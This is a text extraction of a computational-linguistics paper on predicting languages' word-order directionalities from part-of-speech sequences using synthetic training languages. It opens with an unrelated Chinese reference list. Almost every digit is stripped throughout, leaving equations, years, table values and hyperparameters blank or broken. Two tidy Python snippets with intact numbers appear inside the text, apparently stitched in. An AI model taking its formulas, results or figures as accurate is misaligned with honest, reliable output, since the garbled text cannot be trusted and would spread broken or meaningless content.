science series e: technology science, ( ): - . [ ] zhang yousheng, software architecture [m]. version . beijing: tsinghua university press, . [ ] zhang shikun, wang lifu, chang xin, yang fuqing. software architecture description language based on hierarchical message bus [j]. acta electronica sinica, ( ): - . [ ] yang fuqing, mei hong, li keqin.software reuse and software component technology [j]. journal of electronics, ( ): - + . [ ] qin guorong, zhang shikun. research on dynamic simulation and evolution of software architecture based on hierarchical message bus [j]. computer science, ( ): - . [ ] wang you, rong mei, zhang guangquan. application system model based on hierarchical message [j]. computer science, ( ): - + . fine-grained prediction of syntactic typology: discovering latent structure with supervised learning dingquan wang and jason eisner department of computer science, johns hopkins university {wdd,eisner}@jhu.edu abstract we show how to predict the basic word-order facts of a novel language given only a cor- pus of part-of-speech (pos) sequences. we predict how often direct objects follow their verbs, how often adjectives follow their nouns, and in general the directionalities of all depen- dency relations. such typological properties could be helpful in grammar induction. while such a problem is usually regarded as unsu- pervised learning, our innovation is to treat it as supervised learning, using a large collec- tion of realistic synthetic languages as train- ing data. the supervised learner must identify surface features of a language’s pos sequence (hand-engineered or neural features) that cor- relate with the language’s deeper structure (la- tent trees). in the experiment, we show: ) given a small set of real languages, it helps to add many synthetic languages to the training data. ) our system is robust even when the pos sequences include noise. ) our system on this task outperforms a grammar induction baseline by a large margin. 
introduction descriptive linguists often characterize a human language by its typological properties. for instance, english is an svo-type language because its basic clause order is subject-verb-object (svo), and also a prepositional-type language because its adpositions normally precede the noun. identifying basic word order must happen early in the acqui- sition of syntax, and presumably guides the initial interpretation of sentences and the acquisition of a finer-grained grammar. in this paper, we propose a method for doing this. while we focus on word order, one could try similar methods for other typo- logical classifications (syntactic, morphological, or phonological). the problem is challenging because the lan- guage’s true word order statistics are computed from syntax trees, whereas our method has access only to a pos-tagged corpus. based on these pos se- quences alone, we predict the directionality of each type of dependency relation. we define the direc- tionality to be a real number in [ , ]: the fraction of tokens of this relation that are “right-directed,” in the sense that the child (modifier) falls to the right of its parent (head). for example, the dobj relation points from a verb to its direct object (if any), so a di- rectionality of . —meaning that % of dobj de- pendencies are right-directed—indicates a dominant verb-object order. (see table for more such exam- ples.) our system is trained to predict the relative frequency of rightward dependencies for each of dependency types from the universal dependencies project (ud). we assume that all languages draw on the same set of pos tags and dependency relations that is proposed by the ud project (see § ), so that our predictor works across languages. why do this? liu ( ) has argued for using these directionality numbers in [ , ] as fine-grained and robust typological descriptors. we believe that these directionalities could also be used to help de- fine an initializer, prior, or regularizer for tasks like grammar induction or syntax-based machine trans- lation. finally, the vector of directionalities—or the feature vector that our method extracts in or- der to predict the directionalities—can be regarded as a language embedding computed from the pos- tagged corpus. this language embedding may be useful as an input to multilingual nlp systems, such as the cross-linguistic neural dependency parser of ammar et al. ( ). in fact, some multilingual nlp systems already condition on typological properties looked up in the world atlas of language struc- tures, or wals (dryer and haspelmath, ), as transactions of the association for computational linguistics, vol. , pp. – , . action editor: mark steedman. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. typology example verb-object (english) she gave me a raise dobj object-verb (hindi) she me a raise gave vah mujhe ek uthaane diya dobj prepositional (english) she is in a car case postpositional (hindi) she a car in is vah ek kaar mein hai case adjective-noun (english) this is a red car amod noun-adjective (french) this is a car red ceci est une voiture rouge amod table : three typological properties in the world atlas of lan- guage structures (dryer and haspelmath, ), and how they affect the directionality of universal dependencies relations. we review in § . however, wals does not list all properties of all languages, and may be somewhat inconsistent since it collects work by many linguists. 
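for concreteness, a directionality such as p(→ | dobj, l) is simple to estimate when gold dependency trees are available; the sketch below assumes each tree is given as (head position, child position, relation) triples with 1-based token positions, a representation chosen only for this illustration.

```python
from collections import Counter

def directionalities(trees):
    """trees: iterable of dependency trees, each a list of
    (head_position, child_position, relation) triples with 1-based
    token positions. returns {relation: fraction of right-directed tokens}."""
    right, total = Counter(), Counter()
    for tree in trees:
        for head, child, rel in tree:
            total[rel] += 1
            if child > head:    # the child (modifier) falls to the right of its head
                right[rel] += 1
    return {rel: right[rel] / total[rel] for rel in total}

# tiny example: "she gave me a raise", where dobj points rightward.
toy_tree = [(2, 1, "nsubj"), (2, 3, "iobj"), (5, 4, "det"), (2, 5, "dobj")]
print(directionalities([toy_tree])["dobj"])   # 1.0 -> dominant verb-object order
```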
our system provides an automatic alternative as well as a methodology for generalizing to new properties. more broadly, we are motivated by the chal- lenge of determining the structure of a language from its superficial features. principles & parame- ters theory (chomsky, ; chomsky and lasnik, ) famously—if controversially—hypothesized that human babies are born with an evolutionarily tuned system that is specifically adapted to natural language, which can predict typological properties (“parameters”) by spotting telltale configurations in purely linguistic input. here we investigate whether such a system can be tuned by gradient descent. it is at least plausible that useful superficial features do exist: e.g., if nouns often precede verbs but rarely follow verbs, then the language may be verb-final. approach we depart from the traditional approach to latent structure discovery, namely unsupervised learning. unsupervised syntax learners in nlp tend to be rather inaccurate—partly because they are failing to maximize an objective that has many local optima, and partly because that objective does not capture all the factors that linguists consider when assigning syntactic structure. our remedy in this paper is a su- pervised approach. we simply imitate how linguists have analyzed other languages. this supervised ob- jective goes beyond the log-likelihood of a pcfg- like model given the corpus, because linguists do not merely try to predict the surface corpus. their de- pendency annotations may reflect a cross-linguistic theory that considers semantic interpretability and equivalence, rare but informative phenomena, con- sistency across languages, a prior across languages, and linguistic conventions (including the choice of latent labels such as dobj). our learner does not consider these factors explicitly, but we hope it will identify correlates (e.g., using deep learning) that can make similar predictions. being supervised, our objective should also suffer less from local optima. indeed, we could even set up our problem with a convex objective, such as (kernel) logistic regres- sion, to predict each directionality separately. why hasn’t this been done before? our set- ting presents unusually sparse data for supervised learning, since each training example is an en- tire language. the world presumably does not offer enough natural languages—particularly with machine-readable corpora—to train a good classi- fier to detect, say, object-verb-subject (ovs) lan- guages, especially given the class imbalance prob- lem that ovs languages are empirically rare, and the non-iid problem that the available ovs lan- guages may be evolutionarily related. we miti- gate this issue by training on the galactic depen- dencies treebanks (wang and eisner, ), a col- lection of more than , human-like synthetic languages. the treebank of each synthetic language is generated by stochastically permuting the sub- trees in a given real treebank to match the word or- der of other real languages. thus, we have many synthetic languages that are object-verb like hindi but also noun-adjective like french. we know the true directionality of each synthetic language and we would like our classifier to predict that directional- ity, just as it would for a real language. we will show that our system’s accuracy benefits from fleshing out the training set in this way, which can be seen as a form of regularization. 
properties shared within an ovs language family may ap- pear to be consistently predictive of ovs, but are actually con- founds that will not generalize to other families in test data. a possible criticism of our work is that obtaining the input pos sequences requires human annotators, and perhaps these annotators could have answered the typological classification questions as well. in- deed, this criticism also applies to most work on grammar induction. we will show that our system is at least robust to noise in the input pos sequences (§ . ). in the future, we hope to devise similar meth- ods that operate on raw word sequences. data we use two datasets in our experiment: ud: universal dependencies version . (et al., ) a collection of dependency treebanks for languages, annotated in a consistent style with pos tags and dependency relations. gd: galactic dependencies version . (wang and eisner, ) a collection of projective de- pendency treebanks for , synthetic languages, using the same format as ud. the treebank of each synthetic language is generated from the ud treebank of some real language by stochastically permuting the dependents of all nouns and/or verbs to match the dependent orders of other real ud lan- guages. using this “mix-and-match” procedure, the gd collection fills in gaps in the ud collection— which covers only a few possible human languages. task formulation we now formalize the setup of the fine-grained typo- logical prediction task. let r be the set of universal relation types, with n = |r|. we use r→ to denote a rightward dependency token with label r ∈r. input for language l: a pos-tagged corpus u. (“u” stands for “unparsed.”) output for language l: our system predicts p(→| r,l), the probability that a token in language l of an r-labeled dependency will be right-oriented. it predicts this for each dependency relation type r ∈ r, such as r = dobj. thus, the output is a vector of predicted probabilities p̂ ∈ [ , ]n . training: we set the parameters of our system using a collection of training pairs (u,p∗), each of which corresponds to some ud or gd training lan- guage l. here p∗ denotes the true vector of proba- bilities as empirically estimated from l’s treebank. evaluation: over pairs (u,p∗) that correspond to held-out real languages, we evaluate the expected loss of the predictions p̂. we use ε-insensitive loss with ε = . , so our evaluation metric is ∑ r∈r p∗(r | l) · lossε(p̂(→| r,l),p∗(→| r,l)) ( ) where • lossε(p̂,p∗) ≡ max(|p̂−p∗|−ε, ) • p∗(→| r,l) = countl( r→) countl(r) is the empirical esti- mate of p(→| r,l). • p̂(→| r,l) is the system’s prediction of p∗ the aggregate metric ( ) is an expected loss that is weighted by p∗(r | l) = countl(r)∑ r′∈r countl(r ′) , to empha- size relation types that are more frequent in l. why this loss function? we chose an l -style loss, rather than l loss or log-loss, so that the ag- gregate metric is not dominated by outliers. we took ε > in order to forgive small errors: if some pre- dicted directionality is already “in the ballpark,” we prefer to focus on getting other predictions right, rather than fine-tuning this one. our intuition is that errors < ε in p̂’s elements will not greatly harm downstream tasks that analyze individual sentences, and might even be easy to correct by grammar rees- timation (e.g., em) that uses p̂ as a starting point. 
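the evaluation metric above translates directly into code. in the sketch below the true and predicted directionality vectors are dictionaries keyed by relation type; the exact value of ε is not legible in this extraction, so the default used here is only an assumption.

```python
def loss_eps(p_hat, p_star, eps):
    """epsilon-insensitive loss: forgive absolute errors smaller than eps."""
    return max(abs(p_hat - p_star) - eps, 0.0)

def aggregate_loss(p_hat, p_star, rel_freq, eps=0.1):
    """expected loss for one held-out language, weighted by how frequent
    each relation type r is in that language (rel_freq[r] = p*(r | l)).
    eps=0.1 is an assumed value, not recoverable from this extraction."""
    return sum(rel_freq[r] * loss_eps(p_hat[r], p_star[r], eps) for r in rel_freq)

# example with two relation types; the dobj prediction is "in the ballpark".
p_star   = {"dobj": 0.92, "amod": 0.10}
p_hat    = {"dobj": 0.85, "amod": 0.40}
rel_freq = {"dobj": 0.60, "amod": 0.40}
print(round(aggregate_loss(p_hat, p_star, rel_freq), 3))   # 0.08 = 0.6*0.0 + 0.4*0.2
```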
in short, we have the intuition that if our pre- dicted p̂ achieves small lossε on the frequent relation types, then p̂ will be helpful for downstream tasks, although testing that intuition is beyond the scope of this paper. one could tune ε on a downstream task. simple “expected count” baseline before launching into our full models, we warm up with a simple baseline heuristic called expected count (ec), which is reminiscent of principles & pa- rameters. the idea is that if adjs tend to precede nearby nouns in the sentences of language l, then amod probably tends to point leftward in l. after all, the training languages show that when adj and noun are nearby, they are usually linked by amod. fleshing this out, ec estimates directionalities as p̂(→| r,l) = ecountl( r→) ecountl( r→) + ecountl( r←) ( ) proposed by v. vapnik for support vector regression. where we estimate the expected r← and r→ counts by ecountl( r→) = ∑ u∈u ∑ ≤i<j≤|u| j−i<w p( r→| ui,uj) ( ) ecountl( r←) = ∑ u∈u ∑ ≤i<j≤|u| j−i<w p( r←| ui,uj) ( ) here u ranges over tag sequences (sentences) of u, and w is a window size that characterizes “nearby.” in other words, we ask: given that ui and uj are nearby tag tokens in the test corpus u, are they likely to be linked? formulas ( )–( ) count such a pair as a “soft vote” for r→ if such pairs tended to be linked by r→ in the treebanks of the training languages, and a “soft vote” for r← if they tended to be linked by r←. training: for any two tag types t,t′ in the univer- sal pos tagset t , we simply use the training tree- banks to get empirical estimates of p(· | t,t′), taking p( r→| t,t′) = ∑ l sl · countl(t r→ t′)∑ l sl · countl(t,t′) ( ) and similarly for p( r←| t,t′). this can be interpreted as the (unsmoothed) fraction of (t,t′) within a w- word window where t is the r-type parent of t′, com- puted by micro-averaging over languages. to get a fair average over languages, equation ( ) down- weights the languages that have larger treebanks, yielding a weighted micro-average in which we de- fine the weight sl = / ∑ t∈t ,t′∈t countl(t,t ′). as we report later in table , even this simple su- pervised heuristic performs significantly better than state-of-the-art grammar induction systems. how- ever, it is not a trained heuristic: it has no free pa- rameters that we can tune to optimize our evaluation metric. for example, it can pay too much attention to tag pairs that are not discriminative. we therefore proceed to build a trainable, feature-based system. proposed model architecture to train our model, we will try to minimize the eval- uation objective ( ) averaged over the training lan- in our experiment, we chose w = by cross-validation over w = , , , ,∞. thus, the ec heuristic examines the correlation between relations and tags in the training treebanks. but our methods in the next section will follow the formalization of § : they do not examine a training treebank beyond its directionality vector p∗. logistic figure : basic predictive architecture from equations ( )–( ). bw and bv are suppressed for readability. guages, plus a regularization term given in § . . . directionality predictions from scores our predicted directionality for relation r will be p̂(→| r,l) = /( + exp(−s(u)r)) ( ) s(u) is a parametric function (see § . below) that maps u to a score vector in rn . relation type r should get positive or negative score according to whether it usually points right or left. 
the for- mula above converts each score to a directionality— a probability in ( , )—using a logistic transform. . design of the scoring function s(u) to score all dependency relation types given the cor- pus u, we use a feed-forward neural network with one hidden layer (figure ): s(u) = v ψ(wπ(u) + bw ) + bv ( ) π(u) extracts a d-dimensional feature vector from the corpus u (see § . below). w is a h × d ma- trix that maps π(u) into a h-dimensional space and bw is a h-dimensional bias vector. ψ is an element- wise activation function. v is a n×h matrix whose rows can be regarded as learned embeddings of the dependency relation types. bv is a n-dimensional bias vector that determines the default rightwardness of each relation type. we give details in § . . the hidden layer ψ(wπ(u) + bw ) can be re- garded as a latent representation of the language’s word order properties, from which potentially cor- related predictions p̂ are extracted. we gave all training languages the same weight. in prin- ciple, we could have downweighted the synthetic languages as out-of-domain, using cross-validation to tune the weighting. . design of the featurization function π(u) our current feature vector π(u) considers only the pos tag sequences for the sentences in the unparsed corpus u. each sentence is augmented with a special boundary tag # at the start and end. we explore both hand-engineered features and neural features. hand-engineered features. recall that § consid- ered which tags appeared near one another in a given order. we now devise a slew of features to measure such co-occurrences in a variety of ways. by train- ing the weights of these many features, our system will discover which ones are actually predictive. let g(t | j) ∈ [ , ] be some measure (to be de- fined shortly) of the prevalence of tag t near token j of corpus u. we can then measure the prevalence of t, both overall and just near tokens of tag s: πt = mean j g(t | j) ( ) πt|s = mean j: tj =s g(t | j) ( ) where tj denotes the tag of token j. we now define versions of these quantities for particular prevalence measures g. given w > , let the right window wj denote the sequence of tags tj+ , . . . ,tj+w (padding this se- quence with additional # symbols if it runs past the end of j’s sentence). we define quantities πw t|s and πwt via ( )–( ), using a version of g(t | j) that mea- sures the fraction of tags in wj that equal t. also, for b ∈ { , }, we define πw,b t|s and π w,b t using a ver- sion of g(t | j) that is if wj contains at least b tokens of t, and otherwise. for each of these quantities, we also define a corresponding mirror-image quantity (denoted by negating w > ) by computing the same feature on a reversed version of the corpus. we also define “truncated” versions of all quan- tities above, denoted by writing ˆ over the w. in these, we use a truncated window ŵj, obtained from wj by removing any suffix that starts with # in practice, we do backoff smoothing of these means. this avoids subsequent division-by- errors if tag t or s has count in the corpus, and it regularizes πt|s/πt toward if t or s is rare. specifically, we augment the denominators by adding λ, while augmenting the numerator in ( ) by adding λ ·meanj,t g(t | j) (unsmoothed) and the numerator in ( ) by adding λ times the smoothed πt from ( ). λ > is a hyperparameter (see § . ). . . . . . . f . . . . . . . . . . . . . . . f . . . soft-pooling . . . figure : extracting and pooling the neural features. or with a copy of tag tj (that is, s). 
as an example, π ̂, n|v asks how often a verb is followed by at least nouns, within the next words of the sentence and before the next verb. a high value of this is a plausi- ble indicator of a vso-type or vos-type language. we include the following features for each tag pair s,t and each w ∈ { , , , , − ,− ,− ,− , ̂, ̂, ̂, ˆ ,− ̂,− ̂,− ̂,− ˆ }: πwt , π w t|s, π w t|s ·π w s , π w t|s//π w t , π w t //π w t|s, π w t|s//π −w t|s where we define x//y = min(x/y, ) to prevent unbounded feature values, which can result in poor generalization. notice that for w = , πw t|s is bigram conditional probability, πw t|s·π w s is bigram joint prob- ability, the log of πw t|s/π w t is bigram pointwise mu- tual information, and πw t|s/π −w t|s measures how much more prevalent t is to the right of s than to the left. by also allowing other values of w, we generalize these features. finally, our model also uses versions of these features for each b ∈ , . neural features. as an alternative to the manu- ally designed π function above, we consider a neural approach to detect predictive configurations in the sentences of u, potentially including complex long- distance configurations. linguists working with principles & parameters theory have supposed that a single telltale sentence—a trigger—may be enough in the “fraction of tags” features, g(t | j) is undefined ( ) when ŵj is empty. we omit undefined values from the means. the reason we don’t include π−w t|s //π w t|s is that it is in- cluded when computing features for −w. to determine a typological parameter, at least given the settings of other parameters (gibson and wexler, ; frank and kapur, ). we map each corpus sentence ui to a finite- dimensional real vector fi by using a gated recur- rent unit (gru) network (cho et al., ), a type of recurrent neural network that is a simplified variant of an lstm network (hochreiter and schmidhuber, ). the gru reads the sequence of one-hot em- beddings of the tags in ui (including the boundary symbols #). we omit the part of the gru that com- putes an output sequence, simply taking fi to be the final hidden state vector. the parameters are trained jointly with the rest of our typology prediction sys- tem, so the training procedure attempts to discover predictively useful configurations. the various elements of fi attempt to detect vari- ous interesting configurations in sentence ui. some might be triggers (which call for max-pooling over sentences); others might provide softer evidence (which calls for mean-pooling). for generality, therefore, we define our feature vector π(u) by soft- pooling of the sentence vectors fi (figure ). the tanh gate in the gru implies fik ∈ (− , ) and we transform this to the positive quantity f ′ik = fik+ ∈ ( , ). given an “inverse temperature” β, define π β k = ( mean i (f ′ik) β ) /β ( ) this πβk is a pooled version of f ′ ik, ranging from max-pooling as β →−∞ (i.e., does f ′ik fire strongly on any sentence i?) to min-pooling as β → −∞. it passes through arithmetic mean at β = (i.e., how strongly does f ′ik fire on the average sentence i?), ge- ometric mean as β → (this may be regarded as an arithmetic mean in log space), and harmonic mean at β = − (an arithmetic mean in reciprocal space). our final π is a concatenation of the πβ vectors for β ∈ {− ,− ,− , , , , }. we chose these β values experimentally, using cross-validation. combined model. 
we also consider a model s(u) = αsh(u) + ( −α) sn(u) ( ) where sh(u) is the score assigned by the hand- feature system, sn(u) is the score assigned by the for efficiency, we restrict the mean to i ≤ e (the first , sentences). neural-feature system, and α ∈ [ , ] is a hyperpa- rameter to balance the two. sh(u) and sn(u) were trained separately. at test time, we use ( ) to com- bine them linearly before the logistic transform ( ). this yields a weighted-product-of-experts model. . training procedure length thresholding. by default, our feature vec- tor π(u) is extracted from those sentences in u with length ≤ tokens. in § . , however, we try con- catenating this feature vector with one that is ex- tracted in the same way from just sentences with length ≤ . the intuition (spitkovsky et al., ) is that the basic word order of the language can be most easily discerned from short, simple sentences. initialization. we initialize the model of ( )–( ) so that the estimated directionality p̂(→| r,l), re- gardless of l, is initially a weighted mean of r’s di- rectionalities in the training languages, namely p̄r ≡ ∑ l wl(r) p ∗(→| r,l) ( ) where wl(r) ≡ p ∗(r|l)∑ l′ p ∗(r|l′) ( ) this is done by setting v = and the bias (bv )r = log p̄r −p̄r , clipped to the range [− , ]. as a result, we make sensible initial predictions even for rare re- lations r, which allows us to converge reasonably quickly even though we do not update the parame- ters for rare relations as often. we initialize the recurrent connections in the gru to random orthogonal matrices. all other weight matrices in figure and the gru use “xavier initialization” (glorot and bengio, ). all other bias weight vectors are initialized to . regularization. we add an l regularizer to the objective. when training the neural network, we use dropout as well. all hyperparameters (regularization coefficient, dropout rate, etc.) are tuned via cross- validation; see § . . optimization. we use different algorithms in dif- ferent feature settings. with scoring functions that use only hand features, we adjust the feature weights by stochastic gradient descent (sgd). with scor- ing functions that include neural features, we use rmsprop (tieleman and hinton, ). train test cs, es, fr, hi, de, it, la itt, no, ar, pt en, nl, da, fi, got, grc, et, la proiel, grc proiel, bg la, hr, ga, he, hu, fa, ta, cu, el, ro, sl, ja ktc, sv, fi ftb, id, eu, pl table : data split of the real languages, adapted from wang and eisner ( ). (our “train,” on which we do -fold cross- validation, contains both their “train” and “dev” languages.) experiments . data splits we hold out ud languages for testing (table ). for training, we use the remaining ud languages and tune the hyperparameters with -fold cross- validation. that is, for each fold, we train the system on real languages and evaluate on the remaining . when augmenting the real languages with gd languages, we include only gd languages that are generated by “mixing-and-matching” those lan- guages, which means that we add × × = synthetic languages. each gd treebank u provides a standard split into train/dev/test portions. in this paper, we primarily restrict ourselves to the train portions (saving the gold trees from the dev and test portions to tune and evaluate some future grammar induction system that consults our typological predictions). for example, we write utrain for the pos-tagged sentences in the “train” portion, and p∗train for the empirical probabil- ities derived from their gold trees. 
we always train the model to predict p∗train from utrain on each train- ing language. to evaluate on a held-out language during cross-validation, we can measure how well the model predicts p∗train given utrain. for our fi- why × × ? as wang and eisner ( , § ) explain, each gd treebank is obtained from the ud treebank of some substrate language s by stochastically permuting the depen- dents of verbs and nouns to respect typical orders in the super- strate languages rv and rn respectively. there are choices for s. there are choices for rv (respectively rn), including rv = s (“self-permutation”) and rv = ∅ (“no permutation”). in actuality, we measured how well it predicts p∗dev given udev. that was a slightly less sensible choice. it may have harmed our choice of hyperparameters, since dev is smaller than train and therefore p∗dev tends to have greater sampling er- ror. another concern is that our typology system, having been specifically tuned to predict p∗dev, might provide an unrealisti- cally accurate estimate of p∗dev to some future grammar induc- tion system that is being cross-validated against the same dev set, harming that system’s choice of hyperparameters as well. architecture ε-insensitive loss scoring depth ud +gd ec - . . sh . . * sh . . * sh . . sn . . αsh + ( −α) sn . . * table : average expected loss over ud languages, com- puted by -fold cross-validation. the first column indicates whether we score using hand-engineered features (sh), neural features (sn), or a combination (see end of § . ). as a baseline, the first line evaluates the ec (expected count) heuristic from § . within each column, we boldface the best (smallest) re- sult as well as all results that are not significantly worse (paired permutation test by language, p < . ). a starred result is significantly better than the other model in the same row. nal test, we evaluate on the test languages using a model trained on all training languages ( tree- banks for ud, plus × × = when adding gd) with the chosen hyperparameters. to evaluate on a test language, we again measure how well the model predicts p∗train from utrain. . comparison of architectures table shows the cross-validation losses (equa- tion ( )) that are achieved by different scoring ar- chitectures. we compare the results when the model is trained on real languages (the “ud” column) ver- sus on real languages plus synthetic languages (the “+gd” column). the sh models here use a subset of the hand- engineered features, selected by the experiments in § . below and corresponding to table line . although figure and equation ( ) presented an “depth- ” scoring network with one hidden layer, table also evaluates “depth-d” architectures with d hidden layers. the depth- architecture simply pre- dicts each directionality separately using logistic re- gression (although our training objective is not the usual convex log-likelihood objective). some architectures are better than others. we note that the hand-engineered features outperform the neural features—though not significantly, since they make complementary errors—and that com- bining them is best. however, the biggest benefit comes from augmenting the training data with gd languages; this consistently helps more than chang- ing the architecture. id features length loss (+gd) ∅ — . conditional . joint . pmi . asymmetry . rows + . row +b . row +t . * row +b+t . row . row + . table : cross-validation losses with different subsets of hand- engineered features from § . . 
“∅” is a baseline with no fea- tures (bias feature only), so it makes the same prediction for all languages. “conditional” = πwt|s features, “joint” = π w t|s ·πws fea- tures, “pmi” = πwt|s//π w t and π w t //π w t|s features, “asymmetry” = πwt|s//π −w t|s features, “b” are the features superscripted by b, and “t” are the features with truncated window. “+” means con- catenation.the “length” field refers to length thresholding (see § . ). the system in the starred row is the one that we selected for row of table . . contribution of different feature classes to understand the contribution of different hand- engineered features, we performed forward selec- tion tests on the depth- system, including only some of the features. in all cases, we trained in the “+gd” condition. the results are shown in ta- ble . any class of features is substantially better than baseline, but we observe that most of the total benefit can be obtained with just pmi or asymme- try features. those features indicate, for example, whether a verb tends to attract nouns to its right or left. we did not see a gain from length thresholding. . robustness to noisy input we also tested our directionality prediction system on noisy input (without retraining it on noisy input). specifically, we tested the depth- sh system. this time, when evaluating on the dev split of a held-out language, we provided a noisy version of that input corpus that had been retagged by an automatic pos tagger (nguyen et al., ), which was trained on just gold-tagged sentences from the train split of that language. the average tagging accuracy over the languages was only . %. nonetheless, the “ud”-trained and “+gd”-trained systems got re- spective losses of . and . —nearly as good as in table , which used gold pos tags. ms n ec ∅ ud +gd loss . . . . . . table : cross-validation average expected loss of the two grammar induction methods, ms (mareček and straka, ) and n (naseem et al., ), compared to the ec heuristic of § and our architecture of § (the version from the last line of table ). in these experiments, the dependency relation types are ordered pos pairs. n harnesses prior linguistic knowl- edge, but its improvement upon ms is not statistically signif- icant. both grammar induction systems are significantly worse than the rest of the systems, including even our two baseline systems, namely ec (the “expected count” heuristic from § ) and ∅ (the no-feature baseline system from table line ). like n , these baselines make use of some cross-linguistic knowl- edge, which they extract in different ways from the training tree- banks. among our own systems, ec is significantly worse than all others, and +gd is significantly better than all others. (note: when training the baselines, we found that including the +gd languages—a bias-variance tradeoff— harmed ec but helped ∅. the table reports the better result in each case.) . hyperparameter settings for each result in tables – , the hyperparameters were chosen by grid search on the cross-validation objective (and the table reports the best result). for the remaining experiments, we select the depth- combined models ( ) for both “ud” and “+gd,” as they are the best models according to table . the hyperparameters for the selected models are as follows: when training with “ud,” we took α = (which ignores sn), with hidden layer size h = , ψ = sigmoid, l coeff = (no l regularization), and dropout = . . when training with “+gd,” we took α = . 
, with different hy- perparameters for the two interpolated models: sh uses h = , ψ = sigmoid, l coeff = , and dropout = . , while sn uses h = , emb size = , rnn size = , ψ = relu, l coeff = , and dropout = . . for both “ud” and “+gd”, we use λ = for the smoothing in footnote . . comparison with grammar induction grammar induction is an alternative way to predict word order typology. given a corpus of a language, we can first use grammar induction to parse it into dependency trees, and then estimate the directional- ity of each dependency relation type based on these (approximate) trees. however, what are the dependency relation types? current grammar induction systems produce unla- beled dependency edges. rather than try to obtain . . . . . . . . . average proportion . . . . . . . . . . ε -i n s e n s it iv e l o s s cc det emph ccomp prt remnant nsubjpasscsubj conj foreign vocative neg discourse mark case auxpass mwe advcl aux amod reflex parataxis advmod nsubj nummod reparandum punct relcl tmod compound csubjpass poss goeswith xcomp cop name dep appos list nmod dobj iobj expl predetpreconj acl figure : cross-validation loss broken down by relation. we plot each relation r with x coordinate = the proportion of r in the average training corpus = meanl∈train p∗train(r | l) ∈ [ , ], and with y coordinate = the weighted average∑ l∈heldout wl(r) lossε(p̂dev(→|r,l),p ∗ dev(→|r,l)) (see ( )). a ud label like r = amod for each edge, we la- bel the edge deterministically with a pos pair such as r = (parent = noun,child = adj). thus, we will attempt to predict the directionality of each pos-pair relation type. for comparison, we retrain our supervised system to do the same thing. for the grammar induction system, we try the implementation of dmv with stop-probability es- timation by mareček and straka ( ), which is a common baseline for grammar induction (le and zuidema, ) because it is language-independent, reasonably accurate, fast, and convenient to use. we also try the grammar induction system of naseem et al. ( ), which is the state-of-the-art system on ud (noji et al., ). naseem et al. ( )’s method, like ours, has prior knowledge of what typ- ical human languages look like. table shows the results. compared to mareček and straka ( ), naseem et al. ( ) gets only a small (insignificant) improvement—whereas our “ud” system halves the loss, and the “+gd” sys- tem halves it again. even our baseline systems are significantly more accurate than the grammar induc- tion systems, showing the effectiveness of casting the problem as supervised prediction. . fine-grained analysis beyond reporting the aggregate cross-validation loss over the training languages, we break down the cross-validation predictions by relation type. fig- ure shows that the frequent relations are all quite . . . . . . ε-insensitive loss (baseline) . . . . . . ε -i n se n si ti v e l o ss ( fu ll m o d e l) cc det emph ccomp prt remnant nsubjpasscsubj conj foreign vocative neg discourse mark case auxpass mwe advcl aux amod reflex parataxis advmod nsubj nummod reparandum punct relcl tmod compound csubjpass poss goeswith xcomp cop name dep appos list nmod dobj iobj expl predetpreconj acl figure : the y coordinate is the average loss of our model (table line ), just as in figure , whereas the x coordinate is the average loss of a simple baseline model ∅ that ignores the input corpus (table line ). relations whose directionality varies more by language have higher baseline loss. 
relations that beat the baseline fall below the diagonal line. the marker size for each relation is proportional to the x-axis in figure . predictable. figure shows that our success is not just because the task is easy—on relations whose di- rectionality varies by language, so that a baseline method does poorly, our system usually does well. to show that our system is behaving well across languages and not just on average, we zoom in on relation types that are particularly common or of particular interest to linguistic typologists. these relations together account for % of all relation to- kens in the average language: nmod = noun-nominal modifier order, nsubj = subject-verb order (feature a in the world atlas of language structures), dobj = object-verb order ( a), amod = adjective- noun order ( a), and case = placement of both adpositions and case markers ( a). as shown in figure , most points in the first five plots fall in or quite near the desired region. we are pleased to see that the predictions are robust when the training data is unbalanced. for example, the case relation points leftward in most real lan- guages, yet our system can still predict the right di- rectionality of “hi”, “et” and “fi.” the credit goes to the diversity of our training set, which contains various synthetic case-right languages: the system fails on these three languages if we train on real lan- guages only. that said, apparently our training set is still not diverse enough to do well on the outlier “ar” (arabic); see figure in wang and eisner ( ). . . . . . . true . . . . . . p re d ic ti o n no grc_proiel ar da pt et cs grc it got de la_proiel frbg fi la_itt es nl hi en nmod . . . . . . true . . . . . . p re d ic ti o n no grc_proiel arda pt et cs grc it got de la_proiel fr bg fi la_itt es nlhi en nsubj . . . . . . true . . . . . . p re d ic ti o n no grc_proiel ar da pt et cs grc it got de la_proiel fr bg fi la_itt es nl hi en dobj . . . . . . true . . . . . . p re d ic ti o n no grc_proiel ar da pt et cs grc it got de la_proiel fr bgfi la_itt es nl hi en amod . . . . . . true . . . . . . p re d ic ti o n no grc_proielar da pt et cs grc itgot de la_proielfr bg fi la_itt es nl hi en case . . . . . . true . . . . . . p re d ic ti o n nogrc_proielar dapt etcs grcitgotdela_proielfr bg fila_itt esnl hien case (trained with ud) figure : scatterplots of predicted vs. true directionalities (by cross-validation). in the plot for relation type r, each language appears as a marker at (p∗, p̂) (see § ), with the marker size pro- portional to wl(r) (see ( )). points that fall between the solid lines (|p̂−p∗| ≤ ε) are considered “correct,” by the definition of ε-insensitive loss. the last plot (bottom right) shows worse predictions for case when the model is trained on ud only. . binary classification accuracy besides ε-insensitive loss, we also measured how the systems perform on the coarser task of binary classification of relation direction. we say that re- lation r is dominantly “rightward” in language l iff p∗(→| r,l) > . . we say that a system predicts “rightward” according to whether p̂(→| r,l) > . . we evaluate whether this binary prediction is cor- rect for each of the most frequent relations r, for each held-out language l, using -fold cross- validation over the training languages l as in the previous experiment. tables and respectively summarize these results by relation (equal average relation rate ec ∅ ud +gd nmod . . . . . punct . . . . . case . . . . nsubj . . . . . det . . . . . dobj . . . . . amod . . . 
